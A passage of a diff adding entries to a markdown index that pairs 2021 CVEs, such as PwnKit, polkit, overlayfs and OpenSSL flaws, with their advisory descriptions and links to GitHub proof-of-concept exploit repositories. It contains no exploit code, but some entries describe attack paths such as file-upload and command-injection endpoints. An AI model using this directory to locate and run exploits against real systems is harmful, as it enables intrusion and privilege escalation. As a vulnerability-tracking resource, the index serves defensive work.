+Western Digital My Cloud OS 5 devices before 5.10.122 mishandle Symbolic Link Following on SMB and AFP shares. This can lead to code execution and information disclosure (by reading local files).
+
+
+- [piffd0s/CVE-2021-3310](https://github.com/piffd0s/CVE-2021-3310)
+
+### CVE-2021-3317 (2021-01-26)
+
+KLog Server through 2.4.1 allows authenticated command injection. async.php calls shell_exec() on the original value of the source parameter.
+
+
+- [Al1ex/CVE-2021-3317](https://github.com/Al1ex/CVE-2021-3317)
+
+### CVE-2021-3345 (2021-01-29)
+
+_gcry_md_block_write in cipher/hash-common.c in Libgcrypt version 1.9.0 has a heap-based buffer overflow when the digest final function sets a large count value. It is recommended to upgrade to 1.9.1 or later.
+
+
+- [MLGRadish/CVE-2021-3345](https://github.com/MLGRadish/CVE-2021-3345)
+- [SpiralBL0CK/CVE-2021-3345](https://github.com/SpiralBL0CK/CVE-2021-3345)
+
+### CVE-2021-3347 (2021-01-29)
+
+An issue was discovered in the Linux kernel through 5.10.11. PI futexes have a kernel stack use-after-free during fault handling, allowing local users to execute code in the kernel, aka CID-34b1a1ce1458.
+
+
+- [nanopathi/linux-4.19.72_CVE-2021-3347](https://github.com/nanopathi/linux-4.19.72_CVE-2021-3347)
+
+### CVE-2021-3360
+- [tcbutler320/CVE-2021-3360](https://github.com/tcbutler320/CVE-2021-3360)
+
+### CVE-2021-3378 (2021-02-01)
+
+FortiLogger 4.4.2.2 is affected by Arbitrary File Upload by sending a "Content-Type: image/png" header to Config/SaveUploadedHotspotLogoFile and then visiting Assets/temp/hotspot/img/logohotspot.asp.
+
+
+- [erberkan/fortilogger_arbitrary_fileupload](https://github.com/erberkan/fortilogger_arbitrary_fileupload)
+
+### CVE-2021-3395 (2021-02-02)
+
+A cross-site scripting (XSS) vulnerability in Pryaniki 6.44.3 allows remote authenticated users to upload an arbitrary file. The JavaScript code will execute when someone visits the attachment.
+
+
+- [jet-pentest/CVE-2021-3395](https://github.com/jet-pentest/CVE-2021-3395)
+
+### CVE-2021-3438 (2021-05-20)
+
+A potential buffer overflow in the software drivers for certain HP LaserJet products and Samsung product printers could lead to an escalation of privilege.
+
+
+- [TobiasS1402/CVE-2021-3438](https://github.com/TobiasS1402/CVE-2021-3438)
+- [CrackerCat/CVE-2021-3438](https://github.com/CrackerCat/CVE-2021-3438)
+
+### CVE-2021-3441 (2021-10-29)
+
+A potential security vulnerability has been identified for the HP OfficeJet 7110 Wide Format ePrinter that enables Cross-Site Scripting (XSS).
+
+
+- [tcbutler320/CVE-2021-3441-check](https://github.com/tcbutler320/CVE-2021-3441-check)
+
+### CVE-2021-3449 (2021-03-25)
+
+An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).
+
+
+- [riptl/cve-2021-3449](https://github.com/riptl/cve-2021-3449)
+
+### CVE-2021-3490 (2021-05-11)
+
+The eBPF ALU32 bounds tracking for bitwise ops (AND, OR and XOR) in the Linux kernel did not properly update 32-bit bounds, which could be turned into out of bounds reads and writes in the Linux kernel and therefore, arbitrary code execution. This issue was fixed via commit 049c4e13714e ("bpf: Fix alu32 const subreg bound tracking on bitwise operations") (v5.13-rc4) and backported to the stable kernels in v5.12.4, v5.11.21, and v5.10.37. The AND/OR issues were introduced by commit 3f50f132d840 ("bpf: Verifier, do explicit ALU32 bounds tracking") (5.7-rc1) and the XOR variant was introduced by 2921c90d4718 ("bpf:Fix a verifier failure with xor") ( 5.10-rc1).
+
+
+- [chompie1337/Linux_LPE_eBPF_CVE-2021-3490](https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490)
+- [pivik271/CVE-2021-3490](https://github.com/pivik271/CVE-2021-3490)
+
+### CVE-2021-3492 (2021-04-15)
+
+Shiftfs, an out-of-tree stacking file system included in Ubuntu Linux kernels, did not properly handle faults occurring during copy_from_user() correctly. These could lead to either a double-free situation or memory not being freed at all. An attacker could use this to cause a denial of service (kernel memory exhaustion) or gain privileges via executing arbitrary code. AKA ZDI-CAN-13562.
+
+
+- [synacktiv/CVE-2021-3492](https://github.com/synacktiv/CVE-2021-3492)
+
+### CVE-2021-3493 (2021-04-15)
+
+The overlayfs implementation in the linux kernel did not properly validate with respect to user namespaces the setting of file capabilities on files in an underlying file system. Due to the combination of unprivileged user namespaces along with a patch carried in the Ubuntu kernel to allow unprivileged overlay mounts, an attacker could use this to gain elevated privileges.
+
+
+- [briskets/CVE-2021-3493](https://github.com/briskets/CVE-2021-3493)
+- [oneoy/CVE-2021-3493](https://github.com/oneoy/CVE-2021-3493)
+- [Abdennour-py/CVE-2021-3493](https://github.com/Abdennour-py/CVE-2021-3493)
+- [inspiringz/CVE-2021-3493](https://github.com/inspiringz/CVE-2021-3493)
+- [derek-turing/CVE-2021-3493](https://github.com/derek-turing/CVE-2021-3493)
+- [cerodah/overlayFS-CVE-2021-3493](https://github.com/cerodah/overlayFS-CVE-2021-3493)
+- [puckiestyle/CVE-2021-3493](https://github.com/puckiestyle/CVE-2021-3493)
+- [Senz4wa/CVE-2021-3493](https://github.com/Senz4wa/CVE-2021-3493)
+- [fei9747/CVE-2021-3493](https://github.com/fei9747/CVE-2021-3493)
+- [pmihsan/OverlayFS-CVE-2021-3493](https://github.com/pmihsan/OverlayFS-CVE-2021-3493)
+- [smallkill/CVE-2021-3493](https://github.com/smallkill/CVE-2021-3493)
+- [ptkhai15/OverlayFS---CVE-2021-3493](https://github.com/ptkhai15/OverlayFS---CVE-2021-3493)
+
+### CVE-2021-3516 (2021-06-01)
+
+There's a flaw in libxml2's xmllint in versions before 2.9.11. An attacker who is able to submit a crafted file to be processed by xmllint could trigger a use-after-free. The greatest impact of this flaw is to confidentiality, integrity, and availability.
+
+
+- [dja2TaqkGEEfA45/CVE-2021-3516](https://github.com/dja2TaqkGEEfA45/CVE-2021-3516)
+
+### CVE-2021-3560 (2022-02-16)
+
+It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
+
+
+- [aancw/polkit-auto-exploit](https://github.com/aancw/polkit-auto-exploit)
+- [swapravo/polkadots](https://github.com/swapravo/polkadots)
+- [hakivvi/CVE-2021-3560](https://github.com/hakivvi/CVE-2021-3560)
+- [iSTAR-Lab/CVE-2021-3560_PoC](https://github.com/iSTAR-Lab/CVE-2021-3560_PoC)
+- [secnigma/CVE-2021-3560-Polkit-Privilege-Esclation](https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation)
+- [curtishoughton/CVE-2021-3560](https://github.com/curtishoughton/CVE-2021-3560)
+- [Almorabea/Polkit-exploit](https://github.com/Almorabea/Polkit-exploit)
+- [AssassinUKG/Polkit-CVE-2021-3560](https://github.com/AssassinUKG/Polkit-CVE-2021-3560)
+- [cpu0x00/CVE-2021-3560](https://github.com/cpu0x00/CVE-2021-3560)
+- [BizarreLove/CVE-2021-3560](https://github.com/BizarreLove/CVE-2021-3560)
+- [0dayNinja/CVE-2021-3560](https://github.com/0dayNinja/CVE-2021-3560)
+- [TomMalvoRiddle/CVE-2021-3560](https://github.com/TomMalvoRiddle/CVE-2021-3560)
+- [chenaotian/CVE-2021-3560](https://github.com/chenaotian/CVE-2021-3560)
+- [NeonWhiteRabbit/CVE-2021-3560](https://github.com/NeonWhiteRabbit/CVE-2021-3560)
+- [f4T1H21/CVE-2021-3560-Polkit-DBus](https://github.com/f4T1H21/CVE-2021-3560-Polkit-DBus)
+- [innxrmxst/CVE-2021-3560](https://github.com/innxrmxst/CVE-2021-3560)
+- [RicterZ/CVE-2021-3560-Authentication-Agent](https://github.com/RicterZ/CVE-2021-3560-Authentication-Agent)
+- [WinMin/CVE-2021-3560](https://github.com/WinMin/CVE-2021-3560)
+- [UNICORDev/exploit-CVE-2021-3560](https://github.com/UNICORDev/exploit-CVE-2021-3560)
+- [asepsaepdin/CVE-2021-3560](https://github.com/asepsaepdin/CVE-2021-3560)
+- [pashayogi/ROOT-CVE-2021-3560](https://github.com/pashayogi/ROOT-CVE-2021-3560)
+- [TieuLong21Prosper/CVE-2021-3560](https://github.com/TieuLong21Prosper/CVE-2021-3560)
+- [LucasPDiniz/CVE-2021-3560](https://github.com/LucasPDiniz/CVE-2021-3560)
+- [markyu0401/CVE-2021-3560-Polkit-Privilege-Escalation](https://github.com/markyu0401/CVE-2021-3560-Polkit-Privilege-Escalation)
+- [Kyyomaa/CVE-2021-3560-EXPLOIT](https://github.com/Kyyomaa/CVE-2021-3560-EXPLOIT)
+
+### CVE-2021-3572 (2021-11-10)
+
+A flaw was found in python-pip in the way it handled Unicode separators in git references. A remote attacker could possibly use this issue to install a different revision on a repository. The highest threat from this vulnerability is to data integrity. This is fixed in python-pip version 21.1.
+
+
+- [frenzymadness/CVE-2021-3572](https://github.com/frenzymadness/CVE-2021-3572)
+
+### CVE-2021-3625 (2021-09-21)
+
+Buffer overflow in Zephyr USB DFU DNLOAD. Zephyr versions >= v2.5.0 contain Heap-based Buffer Overflow (CWE-122). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-c3gr-hgvr-f363
+
+
+- [szymonh/zephyr_cve-2021-3625](https://github.com/szymonh/zephyr_cve-2021-3625)
+
+### CVE-2021-3656 (2022-03-04)
+
+A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the "virt_ext" field, this issue could allow a malicious L1 to disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape.
+
+
+- [rami08448/CVE-2021-3656-Demo](https://github.com/rami08448/CVE-2021-3656-Demo)
+
+### CVE-2021-3679 (2021-08-05)
+
+A lack of CPU resource in the Linux kernel tracing module functionality in versions prior to 5.14-rc3 was found in the way user uses trace ring buffer in a specific way. Only privileged local users (with CAP_SYS_ADMIN capability) could use this flaw to starve the resources causing denial of service.
+
+
+- [aegistudio/RingBufferDetonator](https://github.com/aegistudio/RingBufferDetonator)
+
+### CVE-2021-3707 (2021-08-16)
+
+D-Link router DSL-2750U with firmware vME1.16 or prior versions is vulnerable to unauthorized configuration modification. An unauthenticated attacker on the local network may exploit this, with CVE-2021-3708, to execute any OS commands on the vulnerable device.
+
+
+- [HadiMed/DSL-2750U-Full-chain](https://github.com/HadiMed/DSL-2750U-Full-chain)
+
+### CVE-2021-3749 (2021-08-31)
+
+axios is vulnerable to Inefficient Regular Expression Complexity
+
+
+- [T-Guerrero/axios-redos](https://github.com/T-Guerrero/axios-redos)
+
+### CVE-2021-3754 (2022-08-26)
+
+A flaw was found in keycloak where an attacker is able to register himself with the username same as the email ID of any existing user. This may cause trouble in getting password recovery email in case the user forgets the password.
+
+
+- [7Ragnarok7/CVE-2021-3754](https://github.com/7Ragnarok7/CVE-2021-3754)
+
+### CVE-2021-3864 (2022-08-26)
+
+A flaw was found in the way the dumpable flag setting was handled when certain SUID binaries executed its descendants. The prerequisite is a SUID binary that sets real UID equal to effective UID, and real GID equal to effective GID. The descendant will then have a dumpable value set to 1. As a result, if the descendant process crashes and core_pattern is set to a relative value, its core dump is stored in the current directory with uid:gid permissions. An unprivileged local user with eligible root SUID binary could use this flaw to place core dumps into root-owned directories, potentially resulting in escalation of privileges.
+
+
+- [walac/cve-2021-3864](https://github.com/walac/cve-2021-3864)
+
+### CVE-2021-3899 (2024-06-03)
+
+There is a race condition in the 'replaced executable' detection that, with the correct local configuration, allow an attacker to execute arbitrary code as root.
+
+
+- [liumuqing/CVE-2021-3899_PoC](https://github.com/liumuqing/CVE-2021-3899_PoC)
+
+### CVE-2021-3929 (2022-08-25)
+
+A DMA reentrancy issue was found in the NVM Express Controller (NVME) emulation in QEMU. This CVE is similar to CVE-2021-3750 and, just like it, when the reentrancy write triggers the reset function nvme_ctrl_reset(), data structs will be freed leading to a use-after-free issue. A malicious guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service condition or, potentially, executing arbitrary code within the context of the QEMU process on the host.
+
+
+- [QiuhaoLi/CVE-2021-3929-3947](https://github.com/QiuhaoLi/CVE-2021-3929-3947)
+
+### CVE-2021-3972 (2022-04-22)
+
+A potential vulnerability by a driver used during manufacturing process on some consumer Lenovo Notebook devices' BIOS that was mistakenly not deactivated may allow an attacker with elevated privileges to modify secure boot setting by modifying an NVRAM variable.
+
+
+- [killvxk/CVE-2021-3972](https://github.com/killvxk/CVE-2021-3972)
+
+### CVE-2021-4034 (2022-01-28)
+
+A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.
+
+
+- [ryaagard/CVE-2021-4034](https://github.com/ryaagard/CVE-2021-4034)
+- [bbjubjub2494/cve-2021-4034-playground](https://github.com/bbjubjub2494/cve-2021-4034-playground)
+- [berdav/CVE-2021-4034](https://github.com/berdav/CVE-2021-4034)
+- [clubby789/CVE-2021-4034](https://github.com/clubby789/CVE-2021-4034)
+- [gbrsh/CVE-2021-4034](https://github.com/gbrsh/CVE-2021-4034)
+- [arthepsy/CVE-2021-4034](https://github.com/arthepsy/CVE-2021-4034)
+- [JohnHammond/CVE-2021-4034](https://github.com/JohnHammond/CVE-2021-4034)
+- [Audiobahn/CVE-2021-4034](https://github.com/Audiobahn/CVE-2021-4034)
+- [dzonerzy/poc-cve-2021-4034](https://github.com/dzonerzy/poc-cve-2021-4034)
+- [nikaiw/CVE-2021-4034](https://github.com/nikaiw/CVE-2021-4034)
+- [mebeim/CVE-2021-4034](https://github.com/mebeim/CVE-2021-4034)
+- [Ayrx/CVE-2021-4034](https://github.com/Ayrx/CVE-2021-4034)
+- [Y3A/CVE-2021-4034](https://github.com/Y3A/CVE-2021-4034)
+- [An00bRektn/CVE-2021-4034](https://github.com/An00bRektn/CVE-2021-4034)
+- [ayypril/CVE-2021-4034](https://github.com/ayypril/CVE-2021-4034)
+- [wongwaituck/CVE-2021-4034](https://github.com/wongwaituck/CVE-2021-4034)
+- [0x05a/my-cve-2021-4034-poc](https://github.com/0x05a/my-cve-2021-4034-poc)
+- [zhzyker/CVE-2021-4034](https://github.com/zhzyker/CVE-2021-4034)
+- [J0hnbX/CVE-2021-4034-new](https://github.com/J0hnbX/CVE-2021-4034-new)
+- [Immersive-Labs-Sec/CVE-2021-4034](https://github.com/Immersive-Labs-Sec/CVE-2021-4034)
+- [kimusan/pkwner](https://github.com/kimusan/pkwner)
+- [N1et/CVE-2021-4034](https://github.com/N1et/CVE-2021-4034)
+- [Nero22k/CVE-2021-4034](https://github.com/Nero22k/CVE-2021-4034)
+- [LukeGix/CVE-2021-4034](https://github.com/LukeGix/CVE-2021-4034)
+- [aus-mate/CVE-2021-4034-POC](https://github.com/aus-mate/CVE-2021-4034-POC)
+- [chenaotian/CVE-2021-4034](https://github.com/chenaotian/CVE-2021-4034)
+- [moldabekov/CVE-2021-4034](https://github.com/moldabekov/CVE-2021-4034)
+- [jostmart/-CVE-2021-4034](https://github.com/jostmart/-CVE-2021-4034)
+- [c3l3si4n/pwnkit](https://github.com/c3l3si4n/pwnkit)
+- [c0d3cr4f73r/CVE-2021-4034](https://github.com/c0d3cr4f73r/CVE-2021-4034)
+- [ly4k/PwnKit](https://github.com/ly4k/PwnKit)
+- [san3ncrypt3d/CVE-2021-4034-POC](https://github.com/san3ncrypt3d/CVE-2021-4034-POC)
+- [fdellwing/CVE-2021-4034](https://github.com/fdellwing/CVE-2021-4034)
+- [xcanwin/CVE-2021-4034-UniontechOS](https://github.com/xcanwin/CVE-2021-4034-UniontechOS)
+- [azminawwar/CVE-2021-4034](https://github.com/azminawwar/CVE-2021-4034)
+- [PeterGottesman/pwnkit-exploit](https://github.com/PeterGottesman/pwnkit-exploit)
+- [sunny0day/CVE-2021-4034](https://github.com/sunny0day/CVE-2021-4034)
+- [artemis-mike/cve-2021-4034](https://github.com/artemis-mike/cve-2021-4034)
+- [whokilleddb/CVE-2021-4034](https://github.com/whokilleddb/CVE-2021-4034)
+- [dadvlingd/CVE-2021-4034](https://github.com/dadvlingd/CVE-2021-4034)
+- [zcrosman/cve-2021-4034](https://github.com/zcrosman/cve-2021-4034)
+- [robemmerson/CVE-2021-4034](https://github.com/robemmerson/CVE-2021-4034)
+- [joeammond/CVE-2021-4034](https://github.com/joeammond/CVE-2021-4034)
+- [luijait/PwnKit-Exploit](https://github.com/luijait/PwnKit-Exploit)
+- [Anonymous-Family/CVE-2021-4034](https://github.com/Anonymous-Family/CVE-2021-4034)
+- [phvilasboas/CVE-2021-4034](https://github.com/phvilasboas/CVE-2021-4034)
+- [hackingyseguridad/CVE-2021-4034](https://github.com/hackingyseguridad/CVE-2021-4034)
+- [vilasboasph/CVE-2021-4034](https://github.com/vilasboasph/CVE-2021-4034)
+- [nobelh/CVE-2021-4034](https://github.com/nobelh/CVE-2021-4034)
+- [callrbx/pkexec-lpe-poc](https://github.com/callrbx/pkexec-lpe-poc)
+- [ch4rum/CVE-2021-4034](https://github.com/ch4rum/CVE-2021-4034)
+- [cd80-ctf/CVE-2021-4034](https://github.com/cd80-ctf/CVE-2021-4034)
+- [Al1ex/CVE-2021-4034](https://github.com/Al1ex/CVE-2021-4034)
+- [ashutoshrohilla/CVE-2021-4034](https://github.com/ashutoshrohilla/CVE-2021-4034)
+- [nikip72/CVE-2021-4034](https://github.com/nikip72/CVE-2021-4034)
+- [NiS3x/CVE-2021-4034](https://github.com/NiS3x/CVE-2021-4034)
+- [thatstraw/CVE-2021-4034](https://github.com/thatstraw/CVE-2021-4034)
+- [luckythandel/CVE-2021-4034](https://github.com/luckythandel/CVE-2021-4034)
+- [Plethore/CVE-2021-4034](https://github.com/Plethore/CVE-2021-4034)
+- [evdenis/lsm_bpf_check_argc0](https://github.com/evdenis/lsm_bpf_check_argc0)
+- [tahaafarooq/poppy](https://github.com/tahaafarooq/poppy)
+- [DosAmp/pkwned](https://github.com/DosAmp/pkwned)
+- [PwnFunction/CVE-2021-4034](https://github.com/PwnFunction/CVE-2021-4034)
+- [locksec/CVE-2021-4034](https://github.com/locksec/CVE-2021-4034)
+- [deoxykev/CVE-2021-4034-Rust](https://github.com/deoxykev/CVE-2021-4034-Rust)
+- [c3c/CVE-2021-4034](https://github.com/c3c/CVE-2021-4034)
+- [Fato07/Pwnkit-exploit](https://github.com/Fato07/Pwnkit-exploit)
+- [EstamelGG/CVE-2021-4034-NoGCC](https://github.com/EstamelGG/CVE-2021-4034-NoGCC)
+- [pengalaman-1t/CVE-2021-4034](https://github.com/pengalaman-1t/CVE-2021-4034)
+- [NeonWhiteRabbit/CVE-2021-4034-BASH-One-File-Exploit](https://github.com/NeonWhiteRabbit/CVE-2021-4034-BASH-One-File-Exploit)
+- [jpmcb/pwnkit-go](https://github.com/jpmcb/pwnkit-go)
+- [JoyGhoshs/CVE-2021-4034](https://github.com/JoyGhoshs/CVE-2021-4034)
+- [galoget/PwnKit-CVE-2021-4034](https://github.com/galoget/PwnKit-CVE-2021-4034)
+- [Yakumwamba/POC-CVE-2021-4034](https://github.com/Yakumwamba/POC-CVE-2021-4034)
+- [Pr0f3ssor/CVE-2021-4034-Pwnkit](https://github.com/Pr0f3ssor/CVE-2021-4034-Pwnkit)
+- [Sakura-nee/CVE-2021-4034](https://github.com/Sakura-nee/CVE-2021-4034)
+- [oreosec/pwnkit](https://github.com/oreosec/pwnkit)
+- [CYB3RK1D/CVE-2021-4034-POC](https://github.com/CYB3RK1D/CVE-2021-4034-POC)
+- [Rvn0xsy/CVE-2021-4034](https://github.com/Rvn0xsy/CVE-2021-4034)
+- [Kirill89/CVE-2021-4034](https://github.com/Kirill89/CVE-2021-4034)
+- [qq224015/CVE-2021-4034](https://github.com/qq224015/CVE-2021-4034)
+- [NeonWhiteRabbit/CVE-2021-4034](https://github.com/NeonWhiteRabbit/CVE-2021-4034)
+- [glowbase/PwnKit-CVE-2021-4034](https://github.com/glowbase/PwnKit-CVE-2021-4034)
+- [sofire/polkit-0.96-CVE-2021-4034](https://github.com/sofire/polkit-0.96-CVE-2021-4034)
+- [codiobert/pwnkit-scanner](https://github.com/codiobert/pwnkit-scanner)
+- [v-rzh/CVE-2021-4034](https://github.com/v-rzh/CVE-2021-4034)
+- [TW-D/PwnKit-Vulnerability_CVE-2021-4034](https://github.com/TW-D/PwnKit-Vulnerability_CVE-2021-4034)
+- [OXDBXKXO/ez-pwnkit](https://github.com/OXDBXKXO/ez-pwnkit)
+- [milot/dissecting-pkexec-cve-2021-4034](https://github.com/milot/dissecting-pkexec-cve-2021-4034)
+- [0x01-sec/CVE-2021-4034-](https://github.com/0x01-sec/CVE-2021-4034-)
+- [navisec/CVE-2021-4034-PwnKit](https://github.com/navisec/CVE-2021-4034-PwnKit)
+- [Almorabea/pkexec-exploit](https://github.com/Almorabea/pkexec-exploit)
+- [teelrabbit/Polkit-pkexec-exploit-for-Linux](https://github.com/teelrabbit/Polkit-pkexec-exploit-for-Linux)
+- [scent2d/PoC-CVE-2021-4034](https://github.com/scent2d/PoC-CVE-2021-4034)
+- [HrishitJoshi/CVE-2021-4034](https://github.com/HrishitJoshi/CVE-2021-4034)
+- [Ankit-Ojha16/CVE-2021-4034](https://github.com/Ankit-Ojha16/CVE-2021-4034)
+- [G01d3nW01f/CVE-2021-4034](https://github.com/G01d3nW01f/CVE-2021-4034)
+- [drapl0n/pwnKit](https://github.com/drapl0n/pwnKit)
+- [rvizx/CVE-2021-4034](https://github.com/rvizx/CVE-2021-4034)
+- [Joffr3y/Polkit-CVE-2021-4034-HLP](https://github.com/Joffr3y/Polkit-CVE-2021-4034-HLP)
+- [ziadsaleemi/polkit_CVE-2021-4034](https://github.com/ziadsaleemi/polkit_CVE-2021-4034)
+- [FDlucifer/Pwnkit-go](https://github.com/FDlucifer/Pwnkit-go)
+- [cspshivam/cve-2021-4034](https://github.com/cspshivam/cve-2021-4034)
+- [an0n7os/CVE-2021-4034](https://github.com/an0n7os/CVE-2021-4034)
+- [DanaEpp/pwncat_pwnkit](https://github.com/DanaEpp/pwncat_pwnkit)
+- [x04000/CVE-2021-4034](https://github.com/x04000/CVE-2021-4034)
+- [x04000/AutoPwnkit](https://github.com/x04000/AutoPwnkit)
+- [hohn/codeql-sample-polkit](https://github.com/hohn/codeql-sample-polkit)
+- [ck00004/CVE-2021-4034](https://github.com/ck00004/CVE-2021-4034)
+- [LJP-TW/CVE-2021-4034](https://github.com/LJP-TW/CVE-2021-4034)
+- [JoaoFukuda/CVE-2021-4034_POC](https://github.com/JoaoFukuda/CVE-2021-4034_POC)
+- [Tanmay-N/CVE-2021-4034](https://github.com/Tanmay-N/CVE-2021-4034)
+- [hahaleyile/CVE-2021-4034](https://github.com/hahaleyile/CVE-2021-4034)
+- [movvamrocks/PwnKit-CVE-2021-4034](https://github.com/movvamrocks/PwnKit-CVE-2021-4034)
+- [Squirre17/CVE-2021-4034](https://github.com/Squirre17/CVE-2021-4034)
+- [Jesrat/make_me_root](https://github.com/Jesrat/make_me_root)
+- [defhacks/cve-2021-4034](https://github.com/defhacks/cve-2021-4034)
+- [ITMarcin2211/Polkit-s-Pkexec-CVE-2021-4034](https://github.com/ITMarcin2211/Polkit-s-Pkexec-CVE-2021-4034)
+- [edsonjt81/CVE-2021-4034-Linux](https://github.com/edsonjt81/CVE-2021-4034-Linux)
+- [nel0x/pwnkit-vulnerability](https://github.com/nel0x/pwnkit-vulnerability)
+- [TomSgn/CVE-2021-4034](https://github.com/TomSgn/CVE-2021-4034)
+- [battleoverflow/CVE-2021-4034](https://github.com/battleoverflow/CVE-2021-4034)
+- [TheJoyOfHacking/berdav-CVE-2021-4034](https://github.com/TheJoyOfHacking/berdav-CVE-2021-4034)
+- [tzwlhack/CVE-2021-4034](https://github.com/tzwlhack/CVE-2021-4034)
+- [jcatala/f_poc_cve-2021-4034](https://github.com/jcatala/f_poc_cve-2021-4034)
+- [Nosferatuvjr/PwnKit](https://github.com/Nosferatuvjr/PwnKit)
+- [TotallyNotAHaxxer/CVE-2021-4034](https://github.com/TotallyNotAHaxxer/CVE-2021-4034)
+- [rhin0cer0s/CVE-2021-4034](https://github.com/rhin0cer0s/CVE-2021-4034)
+- [0x4ndy/CVE-2021-4034-PoC](https://github.com/0x4ndy/CVE-2021-4034-PoC)
+- [antoinenguyen-09/CVE-2021-4034](https://github.com/antoinenguyen-09/CVE-2021-4034)
+- [wudicainiao/cve-2021-4034](https://github.com/wudicainiao/cve-2021-4034)
+- [TanmoyG1800/CVE-2021-4034](https://github.com/TanmoyG1800/CVE-2021-4034)
+- [CronoX1/CVE-2021-4034](https://github.com/CronoX1/CVE-2021-4034)
+- [supportingmx/cve-2021-4034](https://github.com/supportingmx/cve-2021-4034)
+- [A1vinSmith/CVE-2021-4034](https://github.com/A1vinSmith/CVE-2021-4034)
+- [HellGateCorp/pwnkit](https://github.com/HellGateCorp/pwnkit)
+- [Silencecyber/cve-2021-4034](https://github.com/Silencecyber/cve-2021-4034)
+- [Geni0r/cve-2021-4034-poc](https://github.com/Geni0r/cve-2021-4034-poc)
+- [zxc2007/CVE-2021-4034](https://github.com/zxc2007/CVE-2021-4034)
+- [Senz4wa/CVE-2021-4034](https://github.com/Senz4wa/CVE-2021-4034)
+- [Pixailz/CVE-2021-4034](https://github.com/Pixailz/CVE-2021-4034)
+- [toecesws/CVE-2021-4034](https://github.com/toecesws/CVE-2021-4034)
+- [jehovah2002/CVE-2021-4034-pwnkit](https://github.com/jehovah2002/CVE-2021-4034-pwnkit)
+- [fei9747/CVE-2021-4034](https://github.com/fei9747/CVE-2021-4034)
+- [pyhrr0/pwnkit](https://github.com/pyhrr0/pwnkit)
+- [mutur4/CVE-2021-4034](https://github.com/mutur4/CVE-2021-4034)
+- [c0d3cr4f73r/CVE-2021-4034_Python3](https://github.com/c0d3cr4f73r/CVE-2021-4034_Python3)
+- [TheSermux/CVE-2021-4034](https://github.com/TheSermux/CVE-2021-4034)
+- [ps-interactive/lab_cve-2021-4034-polkit-emulation-and-detection](https://github.com/ps-interactive/lab_cve-2021-4034-polkit-emulation-and-detection)
+- [asepsaepdin/CVE-2021-4034](https://github.com/asepsaepdin/CVE-2021-4034)
+- [JohnGilbert57/CVE-2021-4034-Capture-the-flag](https://github.com/JohnGilbert57/CVE-2021-4034-Capture-the-flag)
+- [Part01-Pai/Polkit-Permission-promotion-compiled](https://github.com/Part01-Pai/Polkit-Permission-promotion-compiled)
+- [cdxiaodong/CVE-2021-4034-touch](https://github.com/cdxiaodong/CVE-2021-4034-touch)
+- [LucasPDiniz/CVE-2021-4034](https://github.com/LucasPDiniz/CVE-2021-4034)
+- [Pol-Ruiz/CVE-2021-4034](https://github.com/Pol-Ruiz/CVE-2021-4034)
+- [cerodah/CVE-2021-4034](https://github.com/cerodah/CVE-2021-4034)
+- [FancySauce/PwnKit-CVE-2021-4034](https://github.com/FancySauce/PwnKit-CVE-2021-4034)
+- [wechicken456/CVE-2021-4034-CTF-writeup](https://github.com/wechicken456/CVE-2021-4034-CTF-writeup)
+- [ASG-CASTLE/CVE-2021-4034](https://github.com/ASG-CASTLE/CVE-2021-4034)
+- [X-Projetion/Exploiting-PwnKit-CVE-2021-4034-](https://github.com/X-Projetion/Exploiting-PwnKit-CVE-2021-4034-)
+
+### CVE-2021-4043 (2022-02-04)
+
+NULL Pointer Dereference in GitHub repository gpac/gpac prior to 1.1.0.
+
+
+- [cyberark/PwnKit-Hunter](https://github.com/cyberark/PwnKit-Hunter)
+
+### CVE-2021-4045 (2022-02-11)
+
+TP-Link Tapo C200 IP camera, on its 1.1.15 firmware version and below, is affected by an unauthenticated RCE vulnerability, present in the uhttpd binary running by default as root. The exploitation of this vulnerability allows an attacker to take full control of the camera.
+
+
+- [hacefresko/CVE-2021-4045-PoC](https://github.com/hacefresko/CVE-2021-4045-PoC)
+- [jeffbezosispogg/CVE-2021-4045](https://github.com/jeffbezosispogg/CVE-2021-4045)
+- [pl4int3xt/CVE-2021-4045](https://github.com/pl4int3xt/CVE-2021-4045)
+
+### CVE-2021-4104 (2021-12-14)
+
+JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
+
+
+- [cckuailong/log4shell_1.x](https://github.com/cckuailong/log4shell_1.x)
+- [open-AIMS/log4j](https://github.com/open-AIMS/log4j)
+
+### CVE-2021-4154 (2022-02-04)
+
